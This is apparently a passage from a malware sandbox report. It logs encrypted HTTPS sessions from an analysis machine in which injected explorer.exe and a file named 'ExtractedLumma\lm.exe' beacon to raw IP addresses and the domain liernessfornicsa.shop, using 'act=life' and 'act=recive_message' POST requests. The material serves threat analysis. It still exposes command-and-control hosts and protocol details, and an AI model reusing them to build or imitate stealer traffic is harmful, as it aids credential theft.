46 65 37 6d 69 57 75 38 4a 5a 4e 65 41 57 74 42 57 65 2f 7a 4e 2b 31 70 34 51 2b 31 37 5a 68 78 46 73 46 38 46 73 2f 56 74 Data Ascii: mytgl4hRyI8jsq21V8bQgeGSWC9MKRDR59cPo7cL08Lk2aQoPeNBhUIxz/4InBFuzcUWODw7xCak3pueeJGLLSTv8m4SDDkYamo/BmWGOnwL4ZXgp5HvBNQn/E8x4FxDQN9i+ZWeGvFbPIv/cYo8xbr3Z8QS1uqNdUDYHnu5Q+NMz7qUwsEQY0cowXvDwXKEX8aMGmFMo8wo1aCQ/RHdVIFe7miWu8JZNeAWtBWe/zN+1p4Q+17ZhxFsF8Fs/Vt
2024-07-24 17:57:09 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:09 UTC	685	IN	Data Raw: 57 4c 6f 4f 72 56 41 6b 61 6e 55 62 53 4e 53 2b 66 58 42 41 30 69 5a 33 65 55 54 6d 46 77 6b 69 7a 44 75 43 62 48 4b 74 6e 79 6f 51 4f 4c 54 72 41 63 68 32 73 6f 32 47 35 6b 52 4c 69 71 63 48 48 74 43 6d 65 5a 39 7a 5a 63 6e 73 30 4d 52 53 2b 71 70 77 72 55 6d 56 42 66 42 75 78 34 6a 2b 48 44 77 6d 31 6f 51 66 39 6b 41 4f 31 2b 50 58 68 54 33 4f 64 6f 42 49 72 59 4f 4b 37 50 69 34 71 55 41 72 54 30 44 5a 54 34 4a 6c 50 56 68 6b 30 45 77 39 57 74 52 35 44 50 78 75 44 68 65 63 72 75 74 4c 6f 7a 54 57 68 66 6e 4a 68 68 62 42 4e 42 6e 37 6c 41 7a 78 33 49 4e 54 6b 55 70 57 31 67 42 33 4e 58 6b 4f 4d 73 75 51 7a 57 58 6d 30 30 31 67 61 74 35 34 68 63 2b 33 66 6e 34 70 4d 2f 48 4a 50 54 32 50 49 2b 38 32 4e 49 37 73 6b 66 4e 64 77 6e 61 49 38 70 78 58 4c 4b 46 Data Ascii: WLoOrVAkanUbSNS+fXBA0iZ3eUTmFwkizDuCbHKtnyoQOLTrAch2so2G5kRLiqcHHtCmeZ9zZcns0MRS+qpwrUmVBfBux4j+HDwm1oQf9kAO1+PXhT3OdoBIrYOK7Pi4qUArT0DZT4JlPVhk0Ew9WtR5DPxuDhecrutLozTWhfnJhhbBNBn7lAzx3INTkUpW1gB3NXkOMsuQzWXm001gat54hc+3fn4pM/HJPT2PI+82NI7skfNdwnaI8pxXLKF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49776	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:10 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:10 UTC	1267	OUT	Data Raw: 53 70 6d 68 47 6c 74 46 62 49 78 67 56 51 39 63 42 79 5a 43 72 37 34 4b 75 58 47 6b 37 30 32 72 4d 4c 68 37 52 2b 4a 2b 59 6c 39 65 43 76 49 77 76 56 71 72 66 4c 69 4f 35 55 72 66 35 37 77 4f 6d 69 44 61 74 76 72 2f 68 59 36 72 34 59 36 30 34 50 75 42 62 71 4e 74 46 2f 39 66 61 6a 43 50 49 33 4d 2b 6b 6c 6a 53 57 59 45 45 58 4f 52 4e 4a 55 34 32 43 2b 72 57 55 42 2b 67 41 31 63 32 5a 4a 7a 58 70 57 2f 43 76 57 6f 4e 46 6e 70 6d 45 6e 63 52 44 67 50 54 61 6b 70 52 50 49 33 39 4a 73 53 79 61 7a 66 62 47 4e 38 4d 49 54 6c 51 39 48 52 45 5a 73 63 58 70 44 58 43 79 70 6f 59 78 65 34 61 4a 44 4e 76 6b 66 62 62 41 42 66 52 34 4b 5a 38 35 42 7a 2b 43 47 38 70 2f 71 4e 47 53 51 64 66 4d 59 6d 2b 65 2b 32 68 4b 46 4a 76 63 44 43 62 6a 47 49 6b 4c 4b 58 41 6f 45 6e Data Ascii: SpmhGltFbIxgVQ9cByZCr74KuXGk702rMLh7R+J+Yl9eCvIwvVqrfLiO5Urf57wOmiDatvr/hY6r4Y604PuBbqNtF/9fajCPI3M+kljSWYEEXORNJU42C+rWUB+gA1c2ZJzXpW/CvWoNFnpmEncRDgPTakpRPI39JsSyazfbGN8MITlQ9HREZscXpDXCypoYxe4aJDNvkfbbABfR4KZ85Bz+CG8p/qNGSQdfMYm+e+2hKFJvcDCbjGIkLKXAoEn
2024-07-24 17:57:11 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:11 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:11 UTC	685	IN	Data Raw: 6c 73 44 70 43 54 72 69 6d 67 37 32 5a 78 73 4f 65 62 54 5a 69 50 38 38 39 53 6d 31 75 43 4a 67 35 4b 62 75 44 30 4c 51 56 34 61 4d 74 55 34 42 51 55 37 69 38 50 6c 49 6d 41 63 58 61 6f 42 31 38 33 47 4f 47 70 66 70 57 6c 6e 71 67 4c 50 50 4b 39 6a 4a 42 55 6a 4f 73 4d 35 46 41 58 73 47 61 72 5a 6e 69 34 36 2b 59 2f 4f 72 2b 6c 65 72 63 42 42 46 45 70 73 6f 36 6c 57 6a 59 47 6d 49 79 39 57 63 46 4a 38 71 53 67 45 71 65 6e 76 72 4e 38 67 35 75 4f 35 51 4e 79 61 6a 6d 6a 47 76 37 75 47 46 74 76 4d 68 73 51 56 63 36 31 57 77 2b 51 4e 66 7a 35 78 6e 4a 47 66 67 6a 5a 72 44 51 48 68 71 36 45 73 42 64 4d 43 77 37 36 53 6f 4e 72 79 30 78 37 63 43 4e 4c 66 39 79 6d 53 4c 58 45 6a 48 43 45 4e 6a 71 73 62 64 76 45 70 50 32 36 54 57 64 35 57 31 47 68 2b 69 30 6f 37 Data Ascii: lsDpCTrimg72ZxsOebTZiP889Sm1uCJg5KbuD0LQV4aMtU4BQU7i8PlImAcXaoB183GOGpfpWlnqgLPPK9jJBUjOsM5FAXsGarZni46+Y/Or+lercBBFEpso6lWjYGmIy9WcFJ8qSgEqenvrN8g5uO5QNyajmjGv7uGFtvMhsQVc61Ww+QNfz5xnJGfgjZrDQHhq6EsBdMCw76SoNry0x7cCNLf9ymSLXEjHCENjqsbdvEpP26TWd5W1Gh+i0o7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49777	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:12 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:12 UTC	1267	OUT	Data Raw: 64 42 65 4f 56 4d 77 4c 34 46 52 65 76 67 34 56 44 6c 70 4f 59 45 62 32 4b 67 43 38 50 79 5a 51 59 68 4b 45 74 4b 70 6f 69 4d 2f 58 54 33 79 4c 2f 6e 31 69 34 6c 59 53 75 32 43 51 68 46 75 76 2f 65 4e 55 73 2f 51 54 46 66 4f 4c 47 6b 4d 61 35 71 32 31 54 42 47 6f 72 2f 35 50 56 50 37 4f 50 54 78 34 36 34 76 46 55 54 2f 35 70 4b 4a 59 48 7a 53 42 46 59 2f 50 63 52 42 44 54 38 34 52 4b 54 6c 52 68 67 61 49 2f 4b 6d 6d 31 35 52 4e 51 4f 38 56 6c 37 46 6a 63 44 35 33 74 79 68 6e 48 55 55 53 54 42 52 4e 30 62 48 4f 4f 48 6a 41 57 6c 42 54 45 6e 75 4f 4e 6f 4c 44 54 52 2b 48 38 53 61 6d 33 78 66 73 31 62 70 41 7a 61 54 68 49 6b 4c 44 77 71 6f 2f 56 37 6b 63 63 6d 65 4f 6f 4b 30 52 61 72 4d 35 53 38 76 37 32 56 54 64 75 38 6a 43 4a 69 4b 31 51 6b 41 54 42 47 6f Data Ascii: dBeOVMwL4FRevg4VDlpOYEb2KgC8PyZQYhKEtKpoiM/XT3yL/n1i4lYSu2CQhFuv/eNUs/QTFfOLGkMa5q21TBGor/5PVP7OPTx464vFUT/5pKJYHzSBFY/PcRBDT84RKTlRhgaI/Kmm15RNQO8Vl7FjcD53tyhnHUUSTBRN0bHOOHjAWlBTEnuONoLDTR+H8Sam3xfs1bpAzaThIkLDwqo/V7kccmeOoK0RarM5S8v72VTdu8jCJiK1QkATBGo
2024-07-24 17:57:13 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:13 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:13 UTC	685	IN	Data Raw: 45 59 76 6f 45 4a 7a 69 78 66 51 68 7a 6b 41 70 48 74 59 47 2b 30 43 6c 4e 4a 32 54 35 71 4b 48 6b 78 41 6b 72 2f 69 69 48 45 4f 58 43 42 77 4c 54 52 48 65 63 2b 46 75 7a 62 50 44 66 49 5a 69 30 6b 6a 45 63 56 55 6f 39 43 57 52 6e 35 4b 4d 4f 68 65 52 66 63 44 67 57 33 31 6c 62 77 32 6c 78 48 73 6b 41 41 77 42 78 64 32 41 79 4d 72 54 65 30 31 5a 63 67 72 77 30 49 2f 64 42 36 67 68 2f 42 34 69 6d 73 51 68 52 57 52 51 73 34 5a 45 6d 42 72 43 2b 6e 6e 59 47 7a 47 70 38 6e 61 61 77 43 4d 49 65 73 6b 39 69 67 37 36 2f 74 43 44 44 6b 41 52 76 2b 43 71 79 48 51 71 73 35 56 32 71 7a 78 61 42 66 64 34 69 4b 54 68 59 47 62 50 46 4d 42 36 54 2f 6a 62 43 4f 6a 4a 73 48 30 56 4b 49 66 2f 41 73 58 38 30 43 72 33 7a 6b 63 58 7a 50 48 6e 35 78 2f 6e 39 63 75 4c 61 30 6d Data Ascii: EYvoEJzixfQhzkApHtYG+0ClNJ2T5qKHkxAkr/iiHEOXCBwLTRHec+FuzbPDfIZi0kjEcVUo9CWRn5KMOheRfcDgW31lbw2lxHskAAwBxd2AyMrTe01Zcgrw0I/dB6gh/B4imsQhRWRQs4ZEmBrC+nnYGzGp8naawCMIesk9ig76/tCDDkARv+CqyHQqs5V2qzxaBfd4iKThYGbPFMB6T/jbCOjJsH0VKIf/AsX80Cr3zkcXzPHn5x/n9cuLa0m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49778	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:14 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:14 UTC	1267	OUT	Data Raw: 66 4a 77 4c 6b 72 49 6a 67 47 6b 52 66 65 53 64 2b 6b 64 44 45 51 59 62 6a 61 39 69 73 57 69 2f 70 58 76 73 6e 79 76 66 4e 4c 36 6c 64 47 33 76 71 72 6c 33 6d 6b 69 5a 30 79 62 47 63 6c 58 32 53 56 39 39 42 47 75 46 68 53 6b 74 51 44 6b 51 78 6a 37 71 4a 61 35 69 4a 36 63 57 72 59 79 42 6a 61 44 35 57 61 52 70 50 69 4c 66 2f 6b 56 47 76 58 6d 31 73 50 35 39 72 2b 67 45 6c 44 2f 46 50 6f 56 55 61 5a 7a 31 38 64 33 62 4d 4f 7a 54 4b 62 78 45 41 73 75 78 4e 41 57 2f 4e 33 4c 61 79 4b 68 4d 57 64 45 55 6f 43 73 6c 53 50 52 50 6c 4f 43 42 6c 61 5a 61 4f 49 4a 52 37 33 32 35 4d 37 49 6c 54 5a 74 59 33 67 53 52 75 61 39 59 77 59 6d 34 38 62 69 68 2b 47 6f 48 57 44 66 6f 77 55 66 6c 35 6a 62 61 33 4f 4f 46 34 48 74 6b 79 65 50 67 65 61 6c 49 54 52 39 66 5a 74 6f Data Ascii: fJwLkrIjgGkRfeSd+kdDEQYbja9isWi/pXvsnyvfNL6ldG3vqrl3mkiZ0ybGclX2SV99BGuFhSktQDkQxj7qJa5iJ6cWrYyBjaD5WaRpPiLf/kVGvXm1sP59r+gElD/FPoVUaZz18d3bMOzTKbxEAsuxNAW/N3LayKhMWdEUoCslSPRPlOCBlaZaOIJR7325M7IlTZtY3gSRua9YwYm48bih+GoHWDfowUfl5jba3OOF4HtkyePgealITR9fZto
2024-07-24 17:57:15 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:15 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:15 UTC	685	IN	Data Raw: 65 55 65 50 59 31 31 76 59 69 4d 52 51 78 2b 4f 48 74 4e 79 34 31 50 50 52 49 2f 2b 33 31 54 79 50 74 67 58 49 56 6e 50 39 6c 41 4a 39 4f 64 32 58 48 44 39 77 70 51 47 50 74 32 34 65 30 64 6d 76 30 58 6f 4f 4e 4f 35 4c 37 46 49 34 39 6b 6c 71 38 31 31 4e 34 35 64 77 38 52 76 6d 74 73 52 43 41 2f 73 4a 6c 51 2f 2f 6a 6a 36 4d 6f 49 38 71 7a 74 41 63 44 32 30 65 45 77 6a 56 6b 33 33 6b 4d 4f 2f 63 34 63 52 53 65 4c 6d 6d 6d 4d 63 35 73 35 73 41 66 4c 78 30 57 6d 35 39 70 57 4d 38 6b 4a 30 39 49 6c 50 6a 66 32 30 7a 72 66 50 6b 64 69 74 35 6f 62 72 72 4c 4e 63 66 61 46 6d 4d 68 46 6b 78 43 67 54 6e 57 6b 6c 6d 41 38 67 4e 61 4d 59 6e 62 78 4d 6d 5a 61 75 51 58 51 4b 78 70 76 39 76 4c 6e 71 31 74 6f 30 55 67 53 2f 41 6f 2b 57 4b 62 52 64 76 54 51 7a 39 44 76 Data Ascii: eUePY11vYiMRQx+OHtNy41PPRI/+31TyPtgXIVnP9lAJ9Od2XHD9wpQGPt24e0dmv0XoONO5L7FI49klq811N45dw8RvmtsRCA/sJlQ//jj6MoI8qztAcD20eEwjVk33kMO/c4cRSeLmmmMc5s5sAfLx0Wm59pWM8kJ09IlPjf20zrfPkdit5obrrLNcfaFmMhFkxCgTnWklmA8gNaMYnbxMmZauQXQKxpv9vLnq1to0UgS/Ao+WKbRdvTQz9Dv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49779	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:16 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:16 UTC	1267	OUT	Data Raw: 58 72 2b 57 2b 6f 6f 52 33 53 37 43 2f 39 66 36 49 35 43 79 76 49 62 41 6e 70 70 54 58 78 57 43 47 51 72 47 6f 42 50 76 33 38 69 4a 67 53 42 34 6f 34 42 6a 4a 73 41 38 2b 59 63 61 57 4f 48 76 4d 76 51 4a 4c 59 6f 68 47 7a 66 6c 2b 33 44 4c 46 49 47 34 77 48 74 54 30 71 39 6b 50 69 62 54 2f 54 66 76 4b 69 4d 48 34 6a 70 31 53 4a 32 64 4f 71 4e 31 37 4b 53 78 46 6a 67 56 6d 37 71 39 4a 72 64 48 7a 2f 4b 54 4f 6a 61 52 57 74 50 57 47 43 6c 79 56 78 71 4e 35 55 65 6d 6d 6e 30 54 61 56 30 33 71 39 51 4a 57 33 75 6f 37 48 7a 4a 58 78 6b 32 71 47 50 67 54 73 78 4b 64 31 6a 6b 54 5a 65 42 34 57 37 6b 39 35 6c 4e 5a 5a 55 31 33 4c 31 43 36 53 4b 4a 32 61 65 46 50 73 78 62 6e 78 79 44 79 73 68 2f 71 33 2f 68 35 42 62 50 66 45 2b 4f 76 70 73 37 67 47 7a 6a 68 50 57 Data Ascii: Xr+W+ooR3S7C/9f6I5CyvIbAnppTXxWCGQrGoBPv38iJgSB4o4BjJsA8+YcaWOHvMvQJLYohGzfl+3DLFIG4wHtT0q9kPibT/TfvKiMH4jp1SJ2dOqN17KSxFjgVm7q9JrdHz/KTOjaRWtPWGClyVxqN5Uemmn0TaV03q9QJW3uo7HzJXxk2qGPgTsxKd1jkTZeB4W7k95lNZZU13L1C6SKJ2aeFPsxbnxyDysh/q3/h5BbPfE+Ovps7gGzjhPW
2024-07-24 17:57:17 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:17 UTC	685	IN	Data Raw: 44 66 72 67 47 38 57 54 50 58 48 36 35 42 2f 48 6c 72 62 33 68 4c 41 63 33 33 32 6d 4f 45 50 55 76 49 51 66 42 74 4a 6c 57 38 46 4c 33 74 50 37 6c 48 4e 4a 30 4b 61 35 58 6b 75 67 58 65 62 54 4b 4b 49 50 69 45 61 7a 49 39 69 4c 6b 39 46 67 4d 30 4d 49 66 42 71 59 71 6e 75 46 4d 79 56 30 6b 30 44 68 74 63 39 68 38 4e 62 32 58 72 74 42 6f 4c 6a 59 63 52 32 58 6a 57 6e 63 74 73 42 2f 4c 58 5a 70 31 6d 6d 35 71 36 2b 30 44 41 78 43 50 74 44 57 43 6e 6a 69 41 36 43 48 4d 69 79 42 47 79 51 66 4d 34 6d 70 45 77 5a 39 5a 4e 59 4b 46 4b 6e 67 35 2b 5a 45 6a 4d 2b 42 42 75 79 46 71 45 62 35 49 6e 75 4e 50 59 56 57 4a 6b 6d 44 50 49 79 4c 68 75 74 5a 42 76 5a 4b 62 30 58 37 4b 33 5a 77 48 6b 61 53 45 42 57 76 59 42 50 53 59 75 5a 54 35 43 57 36 45 67 58 57 47 73 76 Data Ascii: DfrgG8WTPXH65B/Hlrb3hLAc332mOEPUvIQfBtJlW8FL3tP7lHNJ0Ka5XkugXebTKKIPiEazI9iLk9FgM0MIfBqYqnuFMyV0k0Dhtc9h8Nb2XrtBoLjYcR2XjWnctsB/LXZp1mm5q6+0DAxCPtDWCnjiA6CHMiyBGyQfM4mpEwZ9ZNYKFKng5+ZEjM+BBuyFqEb5InuNPYVWJkmDPIyLhutZBvZKb0X7K3ZwHkaSEBWvYBPSYuZT5CW6EgXWGsv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49780	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:17 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liernessfornicsa.shop
2024-07-24 17:57:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-24 17:57:18 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sohckf4sam1gtgbd3o7ld0kb7m; expires=Sun, 17-Nov-2024 11:43:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ai4zXPDYqam%2FvIQ9KE%2BYOyC72F0Pxbz7Y16AniBb%2ByyZRyV%2BZ6XGNc6CqCcFgc2slcbOZs2NXDF%2BuBKxeOAvtvsKlGeoVqWAYNx10nVkC3iEfADEyHW%2FRMLT6J52CK%2FbOlEC%2B9R3nLY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cab31df70f9d-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:18 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-24 17:57:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49781	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:18 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:18 UTC	1267	OUT	Data Raw: 70 4b 35 6e 4d 49 5a 58 6b 6a 2f 41 58 4f 56 57 79 58 37 37 51 36 55 44 57 35 6d 45 6c 34 48 50 58 57 4d 65 57 4f 43 51 63 69 30 4b 2b 63 78 66 6a 74 4c 66 31 75 4d 58 61 68 2f 35 53 76 4c 35 4e 77 4b 2b 52 42 59 71 51 78 72 4c 50 63 64 49 6a 69 65 4a 77 74 71 50 4a 78 2b 74 69 33 55 56 59 4e 45 4b 31 35 36 51 39 30 76 7a 32 4c 54 38 77 6c 6e 4b 36 4c 5a 39 75 61 64 4e 72 4f 6a 4f 34 77 57 76 4e 38 56 42 37 46 52 6f 56 4b 38 6b 6c 4c 42 74 70 38 31 4f 42 7a 63 73 4d 4b 7a 55 4f 76 51 46 2b 62 59 33 65 49 77 50 35 36 72 43 41 62 53 59 45 64 52 66 67 63 55 36 39 63 4a 73 53 6a 56 41 70 75 76 56 69 67 6f 67 6e 58 78 77 71 50 53 6f 34 49 37 35 31 47 53 4b 6e 34 53 6d 35 4e 48 6a 42 52 37 7a 37 68 51 6a 34 51 58 73 44 70 45 42 65 30 6b 72 32 77 49 41 72 55 72 Data Ascii: pK5nMIZXkj/AXOVWyX77Q6UDW5mEl4HPXWMeWOCQci0K+cxfjtLf1uMXah/5SvL5NwK+RBYqQxrLPcdIjieJwtqPJx+ti3UVYNEK156Q90vz2LT8wlnK6LZ9uadNrOjO4wWvN8VB7FRoVK8klLBtp81OBzcsMKzUOvQF+bY3eIwP56rCAbSYEdRfgcU69cJsSjVApuvVigognXxwqPSo4I751GSKn4Sm5NHjBR7z7hQj4QXsDpEBe0kr2wIArUr
2024-07-24 17:57:19 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:19 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:19 UTC	685	IN	Data Raw: 6b 75 72 35 55 6f 79 52 5a 6e 2b 69 6a 53 53 47 55 4a 68 4e 32 4e 77 65 5a 67 43 33 33 59 6f 72 79 6a 56 2f 5a 4c 38 53 37 67 68 4b 6a 56 4b 73 4b 44 42 43 78 37 67 4a 4b 6a 58 64 61 36 56 54 69 68 45 4d 38 56 78 65 66 48 5a 6e 33 51 77 76 42 67 51 48 33 37 72 74 6c 4f 77 35 4c 41 6a 63 71 6d 36 70 44 33 47 77 68 30 47 67 63 58 46 38 52 6a 2f 2f 54 79 55 2f 73 61 41 6f 61 4b 74 33 61 2b 37 64 4b 57 4c 47 6c 48 42 63 48 53 56 68 4b 73 65 50 79 4a 4d 51 4e 56 45 50 44 31 73 41 50 61 42 2f 37 39 4c 2f 4a 39 79 45 41 48 42 41 32 43 71 54 33 4e 34 42 55 68 47 55 59 6b 4f 54 44 4d 69 65 44 69 51 6a 54 33 69 2f 32 67 69 6c 71 4d 63 38 33 62 44 49 47 48 77 59 39 2f 6e 47 64 2b 6d 65 46 56 31 76 6e 2b 67 31 57 58 6f 74 75 78 49 6d 4a 35 6e 4c 2f 42 78 46 68 71 33 Data Ascii: kur5UoyRZn+ijSSGUJhN2NweZgC33YoryjV/ZL8S7ghKjVKsKDBCx7gJKjXda6VTihEM8VxefHZn3QwvBgQH37rtlOw5LAjcqm6pD3Gwh0GgcXF8Rj//TyU/saAoaKt3a+7dKWLGlHBcHSVhKsePyJMQNVEPD1sAPaB/79L/J9yEAHBA2CqT3N4BUhGUYkOTDMieDiQjT3i/2gilqMc83bDIGHwY9/nGd+meFV1vn+g1WXotuxImJ5nL/BxFhq3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49782	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:18 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: liernessfornicsa.shop
2024-07-24 17:57:18 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=qToYrJ--&j=
2024-07-24 17:57:19 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vuc3pcnjr9ghn1p8et9ino0sa6; expires=Sun, 17-Nov-2024 11:43:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tv9AZBiY6dLn6%2FUEKu8g7B4dWfpntN1951EzLV0eWgvBRqPMznKUlDm7KYWCBGnQ%2BAKj8XDGOVT2tEwpdABV2LcVABSZ4ONMomr2q78BIiACqNnzM1POnx1ZvUKEEsGOq%2FRc%2FXpDxN8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cab98ecec481-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:19 UTC	561	IN	Data Raw: 31 64 39 61 0d 0a 4d 77 35 55 5a 68 70 36 34 43 61 36 78 72 69 50 58 4b 52 66 72 36 56 67 2b 71 39 34 36 56 67 64 76 58 4b 42 4a 35 4a 71 50 53 74 49 4c 43 4a 45 49 45 37 4d 42 4d 6d 6a 6d 72 55 6f 31 69 72 4b 69 55 4b 62 79 31 72 54 50 6e 7a 52 41 65 51 4c 73 42 78 51 43 51 6c 6f 4e 51 70 70 48 38 77 45 33 37 36 61 74 51 66 66 66 63 72 4c 51 73 43 4e 48 59 4d 36 66 4e 45 51 34 45 7a 39 47 6c 46 49 57 32 49 7a 44 6e 38 5a 68 45 66 57 71 39 33 71 4f 63 55 31 77 63 77 4e 6b 73 4a 61 78 58 70 34 78 31 43 37 42 64 38 50 53 55 70 2b 62 79 63 4e 4f 41 66 4d 58 5a 69 6a 31 71 31 6d 68 6a 37 4b 78 77 79 63 79 78 4f 42 4d 48 58 5a 45 65 56 4e 34 67 4e 62 51 31 74 73 4d 41 39 31 45 4a 42 4b 33 4b 7a 57 37 44 50 46 66 59 4f 48 42 59 43 4e 51 73 74 70 54 64 77 42 38 Data Ascii: 1d9aMw5UZhp64Ca6xriPXKRfr6Vg+q946VgdvXKBJ5JqPStILCJEIE7MBMmjmrUo1irKiUKby1rTPnzRAeQLsBxQCQloNQppH8wE376atQfffcrLQsCNHYM6fNEQ4Ez9GlFIW2IzDn8ZhEfWq93qOcU1wcwNksJaxXp4x1C7Bd8PSUp+bycNOAfMXZij1q1mhj7KxwycyxOBMHXZEeVN4gNbQ1tsMA91EJBK3KzW7DPFfYOHBYCNQstpTdwB8
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 44 4c 67 4d 48 64 68 61 46 55 70 69 37 6c 50 52 2b 77 54 47 4e 6e 30 4b 57 79 42 57 5a 4f 32 33 61 48 76 46 4a 39 51 35 53 53 6c 39 73 4d 77 4e 31 46 6f 52 44 32 36 7a 65 37 44 44 4b 4e 38 37 44 41 64 69 44 57 6f 77 69 50 34 64 51 30 6b 62 30 44 30 31 4b 58 79 77 70 53 6d 46 59 68 55 69 59 2f 4a 72 6e 4f 4d 73 30 78 73 41 4b 6c 4e 38 52 68 44 6c 32 32 42 62 70 52 76 67 43 57 55 64 51 61 7a 4d 44 61 68 61 4a 53 64 75 75 33 4b 31 77 68 6a 72 56 68 31 72 59 34 78 6d 61 4c 45 33 63 41 66 49 46 37 30 5a 47 43 56 5a 67 64 6c 77 34 45 59 70 4c 31 61 6e 51 34 7a 76 4c 4e 4d 7a 47 44 35 37 47 47 34 4d 79 65 39 67 51 35 30 6a 2f 42 6c 39 48 57 57 6b 79 44 6e 46 59 7a 41 54 66 76 4a 71 31 66 76 59 77 77 63 77 4f 32 76 67 5a 68 54 